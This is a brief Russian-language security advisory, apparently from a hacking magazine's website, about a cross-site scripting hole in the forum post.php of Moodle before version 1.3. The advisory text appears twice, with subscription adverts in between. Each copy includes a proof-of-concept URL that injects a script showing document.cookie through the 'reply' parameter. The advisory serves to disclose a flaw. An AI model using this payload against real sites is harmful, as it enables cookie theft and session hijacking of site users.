Программа: Moodle до версии 1.3
Уязвимость в Moodle в 'post.php' позволяет удаленному пользователю выполнить XSS нападение.
Пример/Эксплоит:
http://[target]/moodle/mod/forum/post.php?reply= %3Cscript%3Ealert(document.cookie);%3C /script%3E
Лучшие статьи квартала на бумаге
2 000 ₽
Заказать журнал
Полный доступ к статьям и архиву выпусков
6 000 ₽ в год
Подписаться
Совместный курс «Хакера» и лаборатории «Хаксет»
7 000 ₽
Купить курс
Лучшие статьи за 2021–2022 годы на бумаге
2 000 ₽
Заказать журналПрограмма: Moodle до версии 1.3
Уязвимость в Moodle в 'post.php' позволяет удаленному пользователю выполнить XSS нападение.
Пример/Эксплоит:
http://[target]/moodle/mod/forum/post.php?reply= %3Cscript%3Ealert(document.cookie);%3C /script%3E